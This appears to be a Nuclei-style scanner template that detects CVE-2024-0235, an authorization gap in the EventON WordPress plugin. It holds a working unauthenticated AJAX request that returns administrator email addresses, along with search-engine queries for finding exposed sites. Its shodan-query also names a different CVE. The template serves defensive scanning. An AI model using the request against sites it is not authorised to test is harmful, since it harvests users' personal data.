58 lines
1.9 KiB
YAML
58 lines
1.9 KiB
YAML
id: CVE-2024-0235
|
|
|
|
info:
|
|
name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
|
|
author: princechaddha
|
|
severity: medium
|
|
description: |
|
|
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
|
|
impact: |
|
|
An attacker could potentially access sensitive email information.
|
|
remediation: |
|
|
Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
|
|
- https://github.com/fkie-cad/nvd-json-data-feeds
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-0235
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2024-0235
|
|
cwe-id: CWE-862
|
|
epss-score: 0.00052
|
|
epss-percentile: 0.19233
|
|
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
vendor: myeventon
|
|
product: eventon
|
|
framework: wordpress
|
|
shodan-query: vuln:CVE-2023-2796
|
|
fofa-query: wp-content/plugins/eventon/
|
|
publicwww-query: "/wp-content/plugins/eventon/"
|
|
tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"
|
|
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
body: "_user_role=administrator"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '@'
|
|
- 'status":"good'
|
|
- 'value='
|
|
- '"content":'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100dd24c1d6e69e4b09cfdd6e18d844c71fecf98df6be105ce2f3645b85146d64be0221009bd6cb83542aa43265c7f18b56ac9f07610b6cee11eafbf574dfb9dc05e30d88:922c64590222798bb761d5b6d8e72950 |